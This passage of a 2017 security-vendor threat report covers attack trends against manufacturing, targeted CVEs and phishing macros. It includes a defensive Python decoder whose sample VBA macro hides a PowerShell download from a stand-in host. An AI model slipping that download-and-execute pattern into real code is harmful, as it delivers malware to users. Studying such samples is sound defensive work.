Global Threat Intelligence Center (GTIC) Quarterly Threat Intelligence Report Q2 2017


Table of Contents

Introduction ... 2
Quarterly Highlights ... 3
    Global Threat Visibility ... 3
    Attack Profile of the Manufacturing Industry ... 3
    Apache "Struts" its Stuff ... 3
Global Threat Visibility / Observations ... 4
    Introduction ... 4
    Targeted Industries ... 4
    A Closer Look at Attacks Against Manufacturing Industry ... 4
    Attacks by Type ... 8
    Web Application Attacks ... 8
    Analysis of Malware Detections ... 9
    Attacks by Source ... 11
    France ... 11
    Netherlands ... 12
    Top Targeted Vulnerabilities ... 13
    Adobe Flash Exploits ... 13
    Apache Struts, ShellShock and WannaCry ... 13
    Global Threat Visibility: Final Thoughts ... 14
Attack Profile of the Manufacturing Industry ... 15
    What Makes Manufacturing an Attractive Target? ... 15
    Trends – and Associated Emerging Risks – in the Manufacturing Industry ... 16
    Operational Technology and "Smart Factories" ... 17
    Industry 4.0: Automation, Connectivity and Servitization ... 17
    New Technologies and Reuse of Old Software ... 17
    Cyber Espionage and Theft of IP ... 18
    Recommendations ... 18
    Threats to Manufacturing: Final Thoughts ... 19
Apache CVE-2017-5638 Struts its Stuff: A Quick Look into Apache Struts ... 20
    Introduction ... 20
    What is a Struts Attack? ... 20
    Struts Attacks Timelines ... 21
    Observed Attacks ... 22
    Struts Targets ... 22
    Why Target Struts? ... 23
    Apache Struts Mitigation ... 24
    Struts Signatures and Rules ... 24
    Apache Struts: Summary ... 24
Summary ... 25
About GTIC ... 25
About NTT-CERT ... 25
About NTT Security ... 25

Introduction

NTT Security and its Global Threat Intelligence Center (GTIC) focus on providing timely and actionable information, allowing our clients to gain a better understanding of the threats facing their organizations today. This is accomplished through research and analysis of both current and emerging security threats. Collaboration with the Security Operations Centers (SOCs), Information Security Engineering Team (ISET), Professional Security Services (PSS) and Managed Device Team (MDT) allows NTT Security clients to benefit from our proactive approach to security research and the continuous evolution of detection capabilities.

The GTIC Quarterly Threat Intelligence Report provides a glimpse inside the research conducted by NTT Security researchers, security professionals and analysts, spanning the last three months. In addition to a wide variety of open-source intelligence tools and honeypots, GTIC – Threat Research (TR) also analyzes data from global NTT Security managed security service (MSS) platforms. These patented, cloud-based NTT Security service platforms collect, correlate and analyze security events across systems for our clients around the world, providing researchers with an even deeper understanding of the overall threat landscape.

The quarterly report focuses on several different areas of research and analysis:

• Findings from our analysis of actual events as observed within client environments and our honeynet infrastructure
• Findings related to research from specific threats
• Observations from recent publicly-disclosed breaches and recommendations on how to mitigate and prevent similar attacks
• Analysis of malicious actor Tactics, Techniques and Procedures (TTPs)

In previous editions of the GTIC Quarterly Threat Report, NTT Security analysts have focused on the retail, financial and healthcare industries, providing a glimpse into cyber threats unique to each industry. This issue focuses on several threats the manufacturing industry is facing. And, although the manufacturing industry covers an incredibly broad list of segments, this report addresses several common denominators across the board.

While not typically thought of as highly 'attackable,' manufacturing has been one of the most consistently attacked industries over the past several years. And, in addition to potential threats unique to manufacturers, the industry also faces a variety of threats, prevalent across many industries, including insider and technical threats. This quarterly report takes a closer look at some of these problems.

Copyright 2017 NTT Security 3

Quarterly Highlights

During the second quarter of 2017 (Q2 '17), NTT Security researchers and analysts uncovered information through the research of significant events, identified via global visibility of the NTT Security client base. Some of the key findings based on this research include:

Global Threat Visibility

• Overall, NTT Security observed a 24 percent increase in attacks against our clients during Q2 '17 over the previous quarter.
• Based on NTT Security client data, cybercriminals appear to be leveraging phishing emails with malicious attachments containing PowerShell commands in VBA macros as a primary attack vector.
• 67 percent of all malware distribution in Q2 '17 was email-based.
• Public-facing Microsoft SQL (MSSQL) servers were popular targets for brute-forcing by cybercriminals during Q2 '17.
• Web application attacks accounted for 21 percent of all attacks. 60 percent of those were SQL and PHP injection-based.
• Vulnerabilities allowing code execution accounted for 73 percent of attacks.
• Activity against Adobe Flash Player vulnerabilities accounted for 98 percent of all activity targeting Adobe products.
• Five out of the Top 10 most hostile countries were new to the Top 10 since the fourth quarter 2016 (Q4 '16).

Attack Profile of the Manufacturing Industry

• The manufacturing industry was the most heavily targeted industry across NTT Security clients during Q2 '17, accounting for 34 percent of attack activity.
• The manufacturing industry was also heavily targeted across NTT Security client networks throughout 2016, appearing in the "top three" in five of the six geographic regions. No other industry appeared in the top three more than twice.
• 58 percent of malware distribution in manufacturing environments was via web-based downloads.
• 86 percent of malware in the manufacturing industry were variants of Trojans and droppers.
• Reconnaissance accounted for 33 percent of all activity aimed at manufacturing clients in Q2 '17.

Apache "Struts" its Stuff

• NTT Security detected attacks for Apache Struts, CVE-2017-5638, less than 48 hours after the initial Apache advisory, and less than 24 hours after the release of proof-of-concept (PoC) code.
• Apache Struts became a "top five" attack type within about a week of being initially detected, and at the end of June, was still a "top seven" attack.
• 76 percent of all attacks targeting Apache Struts originated from IP addresses in China.
• 69 percent of Struts attacks from China attempted to disable local firewalls and install malware from remote servers, mostly located in the United States, China and South Korea.
• In the U.S., the most targeted industries of attacks against Apache Struts were education (37 percent) and healthcare (28 percent); in Japan, the most targeted industry was government (46 percent).


Global Threat Visibility / Observations

Introduction

NTT Security analysts observed a 24 percent increase in the number of security events during Q2 '17 from the previous quarter. Analysis of MSSP data suggests this is the result of an increase in reconnaissance and phishing distribution efforts, as threat actors heavily focused on finding vulnerable public-facing servers. Additionally, the tactic of embedding malicious VBA macros into documents sent via phishing emails regained popularity during Q2 '17, as evidenced by an increase in phishing campaigns.

Targeted Industries

Analysis shows the top five industries targeted were manufacturing, finance, health care, business services and technology. Manufacturing was the most heavily targeted industry, with 34 percent of attacks.

[Figure 1. Q2 '17 top targeted industries based on attack volume: Manufacturing 34%, Finance 25%, Health Care 13%, Business Services 10%, Technology 6%, Retail 5%, Other 7%.]

A Closer Look at Attacks Against Manufacturing Industry

Since clients in the manufacturing industry were targeted in 34 percent of all malicious cyber activity, NTT Security analysts focused on the threats in this industry.

[Figure 2. Attack category timeline against manufacturing: weekly volume of reconnaissance, brute forcing and malware events, week of Mar 26 through Jun 11, 2017.]

The top three attack categories in the manufacturing industry were: reconnaissance (33 percent), brute-force attacks (22 percent) and malware (nine percent). Figure 2 shows lower activity against manufacturing throughout April, before several spikes occur in May and June. While there was a general increase in activity against manufacturing organizations throughout the quarter, the most significant increase in malicious activity was related to these three categories.

Reconnaissance Against Manufacturing

Reconnaissance accounted for 33 percent of all activity aimed at manufacturing clients in Q2 '17. Analysis suggests cybercriminals used several different popular scanning tools such as ZmEu, Metasploit and Muieblackcat to scan public-facing systems. These tools come equipped with several plugins, allowing for even beginner cybercriminals to scan and find vulnerabilities in systems and applications. NTT Security identified the intended purpose of recorded reconnaissance traffic as shown in Figure 3.

[Figure 3. Targeted applications of reconnaissance traffic based on volume: PHP Applications 75.0%, DNS Servers 14.0%, SNMP or ICMP Protocols 7.00%, Web Servers 2.00%, All Others 1.25%, WordPress 0.70%, NetBIOS Ports 0.05%.]

As shown, PHP-based applications accounted for 75 percent of all reconnaissance efforts against the manufacturing industry. A majority of this traffic was via the use of ZmEu and Muieblackcat scanning tools, which scan for vulnerabilities in common PHP files and plugins behind web applications and content management systems (CMS) like WordPress. In 2016 WordFence [1] conducted a survey which indicated roughly 56 percent of all hacked WordPress sites were compromised via exploited plugins. The phpMyAdmin plugin was developed to simplify database administration, is the front-end to MySQL databases, and a popular target to gain full access over a database. Although these scans are common, they can be effective if web applications, websites, etc. are not configured following best security practices. This becomes a larger issue if the website or web server being used in a manufacturing organization sets up the web server in a "security unaware" manner, or does not apply automatic updates, potentially leaving the company or organization blind to its vulnerabilities.

The following vulnerabilities associated with PHP applications were targeted in both reconnaissance and exploitation efforts against the manufacturing industry.

Table 1. Top three targeted PHP vulnerabilities via reconnaissance and exploitation efforts against the manufacturing industry.

Result of Exploitation | CVE | Product | Version(s) | CVSS
Remote Code Execution | CVE-2012-1823 | sapi/cgi/cgi_main.c in PHP | < 5.4.2 | 7.5
Remote Code Execution | CVE-2012-2311 | sapi/cgi/cgi_main.c | < 5.4.3 | 7.5
Remote Code Execution | CVE-2015-2208 | phpMyAdmin | 1.1.2 | 7.5

1 https://www.wordfence.com/blog/2016/03/attackers-gain-access-wordpress-sites/

Brute-forcing Manufacturing Systems and Applications

Brute-forcing traffic accounted for 22 percent of all attacks against the manufacturing industry. NTT Security focused on the server/application targets of this traffic, discovering FTP servers were of highest interest at 64 percent, followed by HTTP (18 percent) and SSH (11 percent). Figure 4 shows manufacturing brute-force target volumes for Q2 '17.

[Figure 4. Manufacturing brute force target attack volume: weekly event counts for MSSQL, FTP, HTTP, LDAP, SSH, Magento and MySQL, April 1 through June 11, 2017.]

Per Figure 4, although FTP and HTTP had several large spikes for brute-force attempts, MSSQL was consistently targeted with several thousand events each day in April, May and June across multiple clients. MSSQL is a relational database management system (RDBMS) which is a popular target in manufacturing in terms of brute-forcing. NTT Security discovered thousands of public-facing MSSQL servers with default port 1433 open. Figure 5 shows a simple Shodan query for public-facing MSSQL servers. These queries reveal important details to an attacker such as server name, instance name, version, and port used. Combine this readily available information with a generic brute-forcing tool, and the return on investment for a cybercriminal could be exponential. In January 2017, thousands of public-facing MongoDB databases were compromised [2] and held for ransom by cybercriminals. Not long after, CouchDB and Hadoop servers were compromised [3] using the same attack process. For this reason, it is not only best-practice, but essential that databases/servers not be public-facing and not have default credentials and/or ports to defend against brute-force attacks.

[Figure 5. Simple query using Shodan's API for public facing MSSQL servers.]

2 https://nakedsecurity.sophos.com/2017/01/11/thousands-of-mongodb-databases-compromised-and-held-to-ransom/
3 https://www.bleepingcomputer.com/news/security/database-ransom-attacks-hit-couchdb-and-hadoop-servers/

Malware in the Manufacturing Environment

NTT Security discovered 86 percent of malware in the manufacturing industry were Trojan/dropper variants; in other words, software or applications which drop additional malicious binaries whether they appear to be legitimate or not. NTT Security analyzed the distribution efforts for delivering malware to systems in the manufacturing industry. The most common technique used to distribute malware was drive-by downloads. Figure 6 shows malware distribution efforts throughout Q2 '17 in the manufacturing industry. In addition to the data shown in the chart, NTT Security detected a small volume of attempted malware distribution via email against the manufacturing industry. Since this typically amounted to less than a few attempts per day, it does not display well in Figure 6.

[Figure 6. Malware distribution efforts in the manufacturing industry in Q2 '17: daily event counts by vector (Web, File Transfer, Manual, Other), April 7 through June 6.]

Fifty-eight percent of malware distribution in manufacturing environments was via web-based downloads. Web-based downloads resulting in malware installations via the web could occur when one of the following conditions exist:

• Visiting a compromised website which directly provides the malicious content, or
• Visiting a compromised website which has malicious content provided to it, for example, via malvertising.

NTT Security MSSP data indicates that cybercriminals often rely on web resources to deliver malware to the manufacturing industry.

Attacks by Type

NTT Security analysis indicates 21 percent of all attacks across all industries were web application focused, followed by application specific (16 percent) and malware (12 percent) based attacks. Figure 7 depicts a simple bar graph for the representation of these findings.

[Figure 7. Attack category volume: Web Application Attack 21%, Application Specific Attack 16%, Malware 12%, Reconnaissance 12%, DoS/DDoS 10%, Suspicious 7%, Brute Forcing 6%, Known Bad Source 5%, Client Botnet Activity 4%, Service Specific Attack 4%, Other <3%.]

Web Application Attacks

As stated, 21 percent of all attacks were against web applications. Sixty percent of these attacks were injection-based. This includes, but is not limited to, SQL and PHP-based applications as well as including arbitrary commands in HTTP packets to be executed on the target server.

A Closer Look at Web Injections

While it is common to observe and detect SQLi against public-facing devices, NTT Security identified several types of web injections in Q2 '17; this includes, but is not limited to, PHP-based applications, LDAP, and HTTP.

PHP-based Injections

With thousands of libraries, PHP is one of the most commonly used server-side programming languages. According to W3Techs [4], PHP is deployed on about 83 percent of web servers. As developers continue to introduce vulnerabilities into applications, threat actors will continue to target PHP-based applications. Based on NTT Security observations, command injection attempts against PHP-based applications gained popularity as a specific type of web application attack in Q2 '17.

The primary goal of these attacks is arbitrary code execution, the execution of machine code on a target machine or target process, typically leveraged after exploiting a vulnerability. The execution of arbitrary code allows the cybercriminal to tell the machine or process what to do. Figure 8 shows web application injection targets according to MSSP data. NTT Security discovered a majority of the SQL-based injections were generic and likely being generated via common tools such as Havij or sqlmap, which tend to be noisy. Meanwhile, PHP-based injections are usually more focused, and based on the application or vulnerability being targeted.

[Figure 8. Web application injection targets, SQL-based injections versus PHP-based injections: SQL 97.0%, PHP 3.00%, Other <0.01%.]

4 https://w3techs.com/technologies/details/pl-php/all/all

Analysis of Malware Detections

NTT Security analysts analyzed the differences in malware variants between Q4 '16 and Q2 '17.

Overall, malware detections dropped 41 percent between Q4 '16 and Q2 '17. As shown in Figure 9, Virus/Worms, Adware, and Ransomware all increased in Q2 '17 while the volume of other malware variant detections fell.

[Figure 9. Attack volume differences in malware variants between Q4 '16 and Q2 '17. Variant groups compared: Spyware/Key Logger, Root Kit/Botnet Client, Ransomware/Fakeware, Dialers, Adware/Malicious BHO, Virus/Worm, Trojan/Dropper; four groups fell (down 48%, 25%, 98% and 22%) and three rose (up 1275%, 234% and 4354%).]

NTT Security observed that malware campaigns commonly combine phishing emails with a malicious attachment containing embedded VBA macros. These macros often contain obfuscated PowerShell commands, used to download the final malware payload. While analyzing MSSP data, NTT Security observed 67 percent of all attempted malware distribution was through email. Please note these statistics do not include successful versus unsuccessful malware installations. Figure 10 details these findings.

[Figure 10. Malware distribution across all industries: Email 67%, Other 22%, Web 10%, Manual Upload 1%.]

For example, while analyzing the malware category, MD5 hash e5f6bf18b4b8024c0fd3e17595e8fb36 [5] was discovered in several logs for NTT Security clients. This was the hash of a malicious Excel file sent in a phishing email with the filename "FW20-05-17Dokument-VATI.xls." At initial glance, the document seemed harmless; however, as shown in Figure 11, analysis of one of the two embedded VBA macros detailed obfuscated code. Several strings in each variable value were backwards or represented by ASCII numbers. Variables epitiimsor and marvells were both obfuscated in the same manner, but once decoded and combined, they revealed a PowerShell command used to deliver Windows malware.

NTT Security expects the continued use of phishing attacks with documents containing embedded VBA macros will occur, where attackers use a mix of Windows tools such as PowerShell, Windows Management Instrumentation Command-Line (WMIC), or PsExec to download the malware payload. This technique is effective and distribution can be automated to increase the likelihood of successfully compromising victims.
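The backwards and ASCII-coded strings described above can be recovered statically, without ever running the macro. The Python below is an added example rather than code from the report: the VBA fragment it parses is constructed to mimic that obfuscation pattern (the variable names epitiimsor and marvells are borrowed from the report; the values, the Shell call and the example.invalid URL are made up), and it only handles StrReverse, Chr and & concatenation.

```python
import re

# Constructed VBA macro fragment, modelled on the obfuscation pattern the report
# describes (strings stored backwards or as ASCII codes, concatenated at run time).
# It is NOT the macro from the sample discussed in the report.
SAMPLE_MACRO = r'''
Sub Workbook_Open()
    Dim epitiimsor As String
    Dim marvells As String
    epitiimsor = StrReverse("exe.llehsrewop")
    marvells = Chr(32) & Chr(45) & Chr(110) & Chr(111) & Chr(112) & " -c " & StrReverse("dilavni.elpmaxe//:ptth tseuqeRbeW-ekovnI")
    Shell epitiimsor & marvells, vbHide
End Sub
'''

STRREVERSE_RE = re.compile(r'StrReverse\("([^"]*)"\)')
CHR_RE = re.compile(r'Chr\((\d+)\)')
LITERAL_RE = re.compile(r'"([^"]*)"')
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.MULTILINE)
SHELL_RE = re.compile(r'^\s*Shell\s+(.+?)(?:,\s*\w+)?\s*$', re.MULTILINE)

# Tokens an analyst would want flagged in a recovered command line.
INDICATORS = ("powershell", "wmic", "psexec", "invoke-webrequest", "downloadfile")


def decode_expression(expr, variables):
    """Statically evaluate a VBA string expression built from literals, StrReverse(),
    Chr() and previously assigned variables joined with '&'. Unknown tokens are marked,
    not guessed, so the analyst sees exactly what could not be resolved."""
    parts = []
    for token in (t.strip() for t in expr.split("&")):
        if (m := STRREVERSE_RE.fullmatch(token)):
            parts.append(m.group(1)[::-1])          # undo the backwards string
        elif (m := CHR_RE.fullmatch(token)):
            parts.append(chr(int(m.group(1))))      # undo the ASCII-number encoding
        elif (m := LITERAL_RE.fullmatch(token)):
            parts.append(m.group(1))                # plain string literal
        elif token in variables:
            parts.append(variables[token])          # earlier decoded variable
        else:
            parts.append(f"<unresolved:{token}>")
    return "".join(parts)


def extract_variables(macro):
    """Walk assignments in source order so later variables can reference earlier ones."""
    variables = {}
    for name, expr in ASSIGN_RE.findall(macro):
        variables[name] = decode_expression(expr, variables)
    return variables


def recover_shell_command(macro):
    """Return the command line a Shell call would launch, or None if there is no Shell call."""
    match = SHELL_RE.search(macro)
    if not match:
        return None
    return decode_expression(match.group(1), extract_variables(macro))


def triage(macro):
    """Decode the macro and report which indicator strings the recovered command contains."""
    command = recover_shell_command(macro)
    hits = [i for i in INDICATORS if command and i in command.lower()]
    return {"command": command, "indicators": hits, "suspicious": bool(hits)}


if __name__ == "__main__":
    result = triage(SAMPLE_MACRO)
    print(result["command"])
    print("indicators:", ", ".join(result["indicators"]))
```

Real macros add further layers (Replace, Mid, split arrays, string arithmetic), so treat an unresolved token as a prompt to extend the decoder, not as proof the macro is benign.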

[Figure 11. _VBA_PROJECT_CUR/VBA/ThisWorkbook source code (screenshot of the obfuscated macro, not reproduced here).]

[Figure 12. Deobfuscated PowerShell command to retrieve mps.exe (365c4b6e651034daaebd4363efa4b0f) [6].]

5 https://www.virustotal.com/en/file/e3fff8975c852e6a7e4909033a2dec9c1c7ae794be2dd0e45398a6541293101b/analysis/
6 https://www.virustotal.com/en/file/96c8aea7d0f65dfc41ccaf5384abfe19d5ea0f1f1e9c6359ae985932ac4db1e8/analysis/

Attacks by Source

NTT Security analysts reviewed the top countries hosting systems which generated malicious traffic between Q4 '16 and Q2 '17.

During Q2 '17, two countries stood out due to the pattern or uniqueness of activity. Over the past few years, the infrastructures located in France and the Netherlands have improved significantly. Each offers a wide range of services to support individual and specific needs, including telephony, hosting, cable, and in some cases, all the above. The hosting and virtual private server (VPS) market has created a surge in affordable offshore hosting. Threat actors are starting to migrate and/or exploit vulnerable servers in these two countries more and more. Regardless of the actor's purpose or reasoning, they will continue to use and exploit vulnerable services.

Table 2. Top non-U.S. attack countries.

Rank Q2 2017 | Attack Source | % of Attack | Rank Q4 2016
1 | France | 47% | 5
2 | Netherlands | 8% | 8
3 | China | 6% | 3
4 | Brazil | 4% | >20
5 | United Kingdom | 4% | 1
6 | Canada | 4% | 8
7 | Germany | 3% | >20
8 | Chile | 1% | >20
9 | Puerto Rico | 1% | >20
10 | Hungary | 1% | >20

France

France accounts for 47 percent of hostile attack traffic, most of which appears to be probing or scanning-related activities. However, monitoring data includes multiple examples of exploit and unauthorized access attempts. The largest cluster of exploit events is associated with Online S.A.S., a major telecommunications entity providing internet access to France, Netherlands and possibly other EU countries, as this provider continues to expand its reach. Some of the servers appear to be running Nginx and/or other proxy configurations. Because of this, it is likely the true attackers are operating from other locations. This type of activity will likely increase, as few provisions are historically taken by the users and Tier 1 providers to remedy the situation by securing users and enforcing policies. Overall, Figure 13 displays the top ten attacks originating from France. Reconnaissance activity is the most common, at 93 percent of all detected activity.

[Figure 13. Top ten attack categories originating from hosts in France: Reconnaissance 93%, Known Bad Source 3%, and under 1% each for Brute Forcing, DoS/DDoS, Web Application Attack, Application Specific Attack, Malware, Suspicious, Client Botnet Activity and Service Specific Attack.]

Netherlands

The Netherlands came in a distant second. Unlike France, whose traffic originated from multiple ISP/providers, sources in the Netherlands originated from only three IP addresses allocated to KPN B.V., a Dutch-based telecommunications company providing internet and mobile phone access. Based on the event data, a three-day initiative from two of these IP addresses targeted a single victim in the manufacturing industry. Activity from 145.129.22[.]220 accounted for 75 percent of the activity; 25 percent was from 145.129.21[.]42. Activity from the third IP address was ultimately insignificant. Their primary goal was host and network discovery via DNS zone transfers. Zone transfers can disclose a large amount of information about a network and organization, depending on the resource records (RR) being used and host nomenclature.

Overall, Figure 14 displays the top ten attacks originating from the Netherlands, showing that reconnaissance was the most commonly detected attack type with 70 percent of all hostile activity.

[Figure 14. Top ten attack categories originating from hosts in the Netherlands: Reconnaissance 70%, Web Application Attack 22%, Application Specific Attack 6%, and under 1% each for Malware, Known Bad Source, Brute Forcing, DoS/DDoS, Suspicious, Service Specific Attack and Client Botnet Activity.]

Top Targeted Vulnerabilities

During Q2 '17, code execution-based vulnerabilities accounted for 73 percent of the top attacks. The top three CVEs listed in Table 3 were most popular.

Table 3. Code execution target-campaign event percentage.

CVE | Event Percentage | Target/Campaign
CVE-2016-4116 | 57% | Adobe Flash
CVE-2017-5638 | 24% | Apache Struts
CVE-2014-6271 | 10% | ShellShock
CVE-2017-0147 | 3% | WannaCry (EternalBlue)
CVE-2011-3230 | 3% | Safari Exploit
CVE-2009-0183 | 3% | Free Download Manager

These vulnerabilities were observed being exploited from sources in 68 countries. The most prolific attempts originated from China, Poland and France. This trend spanned across 15 industries with manufacturing and finance as the top two affected, and technology as a distant third place. In a change from previous analysis, the telecommunication industry was targeted relatively lightly during Q2 '17. The exception to this was a small subset within telecommunications, specifically businesses that provide hosting or other connectivity services, which were highly targeted by attempts to exploit vulnerabilities in Apache Struts and Bash (Shellshock).

The identified CVEs in the top-ten can be categorized into three attack methodologies:

• code execution
• data theft
• denial of service (DoS)

[Figure 15. Attack method visualization according to CVE: Code Execution 73%, Data Theft 20%, Denial of Service (DoS) 7%.]

[Figure 16. Industries targeted via the top 10 CVEs: Manufacturing 29%, Finance 26%, Technology 8%, Health Care 8%, Non-Profit 7%, Construction/Real Estate 7%, Retail 6%, Other 9%.]

Adobe Flash Exploits

Signatures for CVE-2016-4116 triggered on specific port traffic used to laterally move files. Flash has been, and will for the foreseeable future, continue to be a highly-targeted product due to its widespread use across multiple operating systems, and its history of vulnerabilities. In comparison to other Adobe products, Flash accounted for a staggering 98 percent of all Adobe-based vulnerability events. Of that total, the most targeted vulnerability was CVE-2016-4116.

Table 4. Top five Adobe Flash Player vulnerabilities being targeted.

Adobe Product | Event Percentage | CVE Total
Flash Player | 98.40% | 14
Adobe AIR | 1.30% | 2
Acrobat Reader | 0.10% | 5
Air SDK | 0.10% | 1
Acrobat | 0.10% | 4

Apache Struts, ShellShock and WannaCry

There is a reason why attackers from each of the top countries consistently target these vulnerabilities. Each can be used to gain access or remotely control Windows and Linux-based systems. The exception is WannaCry which utilized the EternalBlue exploit, and specifically targets Windows systems. The success of exploiting these vulnerabilities is dependent on the premise that many vendors and administrators have not patched, updated systems or taken additional precautions. Until industry improves the consistency and regularity with which they update systems, such attacks will continue. NTT Security analysts observed the CVEs associated with these now infamous names trending across fifteen industries. The heaviest concentration of this activity was in the manufacturing and finance industries.

Financial institutions can lose millions of dollars as a result of money stolen from accounts, or money paid for ransomware. Manufacturing can lose just as much from theft of product ideas, and intellectual property sold to competitors. All the industries on the list have valuable information to protect.

Global Threat Visibility: Final ThoughtsNTTSecurityanalystsobservedasmalloverallincreaseindetectionsinQ2’17.Thefirsthalfof2017includedaheavyfocusonmanufacturingandthedistributionofmalwarethroughlargephishingcampaigns.WebapplicationsbasedonPHPcontinuetobeapopulartargetbyhackerswhounderstandthelackofsecurityimplementationsintopluginsandapplications.Asbrute-forcingcontinuestobepopular,NTTSecurityanalyzedseveralbrute-forcingattemptsagainstpublicMSSQLserverswithdefaultportsandout-of-dateversions.ThisshouldbeanimportantremindertonotallowRDBMSanddatabasestobepublic-facing,asattackersfocusmoreonthemonetizationofransom-styleattacks.AsAdobeFlashPlayerremainstoberiddledwithRCEvulnerabilitiesbeingtargetedbycybercriminals,itiscrucialtounderstanddrive-byandweb-basedattackscontinuetobeprevalent;targetingnotonlyunpatchedservers,butcommonwebvisitorsintheorganization,includingtheorganization’semployeesandclients.WithrecentattacksinvolvingaPetyavariant,WannaCry,Trickbotandothers,NTTSecuritypredictscybercriminalswillcontinuetosupporttheireffortswithphishingcampaignsthroughout2017todeliverevermorerobustmalware.Afteranalyzingattacksfromhostsinseveralcountries,itisevidentcompromisedhostsincountrieswhichtypicallyflyundertheradar–suchastheNetherlands–arecomingbackintothespotlight.NTTSecurityexpectsthistrendtocontinueasthesecountriesbuildtheirinfrastructure,whichcouldbecomecompromisedandleveragedinfuturecyberattacks.

NTT Security recommends the following to help mitigate the threats discussed above:

• Conduct regular vulnerability scans and penetration testing to identify vulnerabilities.

• Always take a defense-in-depth (DiD) approach to security controls, including defining internal segmentation and segregation, which increases the complexity for cybercriminals to become more successful during attacks.

• Establish an Incident Response Team supported by formal and documented processes and procedures.

• Enforce effective patch management through both automated and manual processes to ensure necessary software and hardware patches are applied, mitigating successful exploitation attempts.

• Consider whitelisting approved applications.

• Ensure critical data, information, operating systems, applications, tools, and configuration files are backed up and stored offline. Processes and procedures to revert to backups during an incident should be documented and tested on a routine basis.


Attack Profile of the Manufacturing Industry

The cost of cybercrime to businesses is expected to reach $6 trillion annually by 2021 [7]. Globally, the manufacturing industry is now one of the most frequently attacked industries, second only to healthcare, making potential losses in this industry catastrophic.

The manufacturing industry is increasingly being targeted, as threat actors perceive the prospective gains in attacking networks in this industry. Per the National Center for Manufacturing Sciences (NCMS), 33 percent of all cyberattacks in 2015 were against the manufacturing sector. In 2016, 39 percent of manufacturing firms said they’d been breached, with breaches costing between $1-10 million. This trend will certainly continue.

Targeting of the manufacturing industry was also seen in NTT Security client data over the last year. The most recent NTT Security Global Threat Intelligence Report (GTIR) [8] showed the manufacturing industry was heavily targeted across client networks during 2016, appearing in the top three targeted industries in five of the six geographic regions evaluated. No other industry appeared in the top three more than twice. Manufacturing was the most attacked sector in Africa and the Americas, and the second most attacked sector in Asia (32 percent, trailing only finance), so geographic areas with significant manufacturing capabilities are seeing the impact of this focus.

This trend continues into 2017. In fact, the manufacturing industry was the most heavily targeted industry across NTT Security clients during Q2’17.

Global estimates, across all industries, of losses in the trillions of dollars over the next five years are not surprising given the threats industries across the globe face daily, particularly threats to the manufacturing industry, which are becoming progressively more difficult to defend against, as technology and connectivity continue to increase at an astounding rate.

The industry itself covers an incredibly broad range of organizations: fabrics and textiles, food products, construction materials, pharmaceuticals, plastics, metals, computer components, automobiles, just to name a few. The reasons for any given segment to be targeted are innumerable – from intellectual property (IP) theft to espionage to using a firm as a stepping stone for further targeting (for instance, if a targeted manufacturing firm is in the supply chain of another firm or government organization).

What other factors make the manufacturing industry more susceptible to being targeted by hackers, cybercriminals and other threat actors? Is the industry fundamentally more vulnerable?

What Makes Manufacturing an Attractive Target?

Rebecca Taylor, Senior Vice President for NCMS, says, “Most manufacturing systems today were made to be productive – they were not made to be secure. Every manufacturer is at risk – it isn’t a matter of if they will be targeted, it’s a matter of when.”

Intellectual property is at a premium, and in a market where fractions of market shares can mean millions – or billions – of dollars, competition is fierce. Industrial control systems (ICS) are often left unguarded, and worse yet, they are often built with little to no thought for security, sometimes making protection of the device itself impractical. There is a lack of investment in cybersecurity, as funds are being spent upgrading systems to be more productive or more efficient. In fact, almost half of top executives in manufacturing firms neither feel confident in their technology to protect their networks, nor do they feel they have adequate funding.

7 http://cybersecurityventures.com/cybersecurity-market-report/
8 https://www.nttsecurity.com/en/what-we-think/gtir-2017/

And, connectivity is increasing. From Internet of Things (IoT) and Operational Technology (OT) devices to robotics to human-machine interfacing (HMI), this connectivity is improving automation, and, subsequently, cutting costs and increasing productivity. Unfortunately, this increases the attack surface. Many industries incorrectly believe “it can’t happen to us. We don’t have vast amounts of consumer data, health records, or credit card information. We just make ‘widgets.’”

While the above line of thought may be the first inclination, remember that, year after year, the manufacturing industry has consistently been one of the top most frequently targeted industries.

Consider the consequences of a breach: fewer ‘widgets’ to sell, competitors gaining insight into your widget production processes or proprietary widget innovations, cybercriminals demanding a ransom to decrypt this same information or foreign nations using this same information to undercut a major bid. This could translate into decreased productivity, increased network downtime, and, ultimately, a decrease in profits. How much decrease in “X” can your organization afford?

There is no question that cybercriminals are looking to capitalize on this highly attackable industry. Others may want to damage a firm’s brand and reputation, perhaps to benefit their own.

But cybercriminals and competitors aren’t alone in targeting those in this industry, as nation-state actors are doing the same.

Per China’s newest Five Year Plan (FYP), the Chinese government continues to prioritize significant efforts within the manufacturing sector through 2020. In early December 2016, China released its newest FYP for intelligent manufacturing in attempts to increase its competitiveness in the “factory of the world,” a long-term strategy to generate new growth in the country’s manufacturing sector.

Additionally, “Made in China 2025” targets ten key segments of the industry for additional government support:

• New energy vehicles

• Next-generation information technology (IT)

• Biotechnology

• New materials

• Aerospace

• Ocean engineering and high-tech ships

• Railway

• Robotics

• Power equipment

• Agricultural machinery

Chinese cyber actors have attacked industries listed in the FYP in the past, primarily to accrue IP and other data. Those segments identified as priorities for research and development can expect continued interest from these actors. Based on experience with attacks from China over the past several years, NTT Security expects these types of attacks to continue in all industries, but particularly in manufacturing.

Trends – and Associated Emerging Risks – in the Manufacturing Industry

In this rapidly changing industry, a top priority is cutting operational costs, while manufacturers leverage technology to ensure future growth.

Manufacturing organizations have taken on a much more widely-distributed environment and infrastructure. Increasing numbers of users and devices will greatly increase the number of avenues into your network from threat actors – from cybercriminals to nation-state actors.

9 http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats
10 https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/609186/Cyber_Security_Breaches_Survey_2017_main_report_

The industry has become more vulnerable due to its focus on technological advances, while not investing as heavily in the cybersecurity budget as in other priorities. This is not to say that the industry is ignoring security, rather that the investment in technology and enabling services has taken a priority. As a result, cybersecurity may have taken a back seat. This holds true not only in the manufacturing industry, but in many sectors. In fact, the Cyber Security Breaches Survey 2017 [10], published earlier this year, suggests manufacturers are less likely than many other industries to rate cybersecurity as a serious priority. Just 31 percent of firms in the manufacturing industry regarded cybersecurity as a high priority. In contrast, 61 percent in the financial sector held cybersecurity as a high priority, along with 49 percent in both the healthcare and education sectors. To some extent, this is understandable. Anyone can look at the data and think that “personal healthcare information” and “cardholder data” are more sensitive than “widgets,” right?

Operational Technology and “Smart Factories”

